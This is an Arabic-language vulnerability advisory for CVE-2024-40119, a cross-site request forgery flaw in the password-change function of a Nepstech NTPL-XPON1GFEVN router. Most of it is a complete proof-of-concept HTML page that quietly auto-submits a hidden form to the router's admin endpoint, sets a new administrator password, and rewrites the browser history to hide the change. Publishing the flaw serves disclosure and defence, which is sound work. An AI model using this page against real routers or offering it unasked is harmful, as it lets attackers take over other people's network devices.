
ثغرة تزوير الطلبات عبر المواقع (CSRF) في وظيفة تغيير كلمة المرور، والتي تسمح للمهاجمين عن بُعد بتغيير كلمة مرور المسؤول دون موافقة المستخدم، مما يؤدي إلى احتمال الاستيلاء على الحساب.
Subhodeep Baroi
CVE-2024-40119 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) في راوتر واي فاي NTPL-XPON1GFEVN الإصدار 1.0 من Nepstech والبرنامج الثابت v2.0.1. تسمح هذه الثغرة للمهاجمين عن بُعد بتغيير كلمة مرور المسؤول دون موافقة المستخدم، مما قد يؤدي إلى الاستيلاء على الحساب.
يمكن للمهاجم عن بُعد إنشاء صفحة HTML خبيثة تؤدي إلى تشغيل وظيفة تغيير كلمة المرور عند زيارتها من قبل مستخدم مصادَق. فيما يلي نموذج لناقل الهجوم:
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>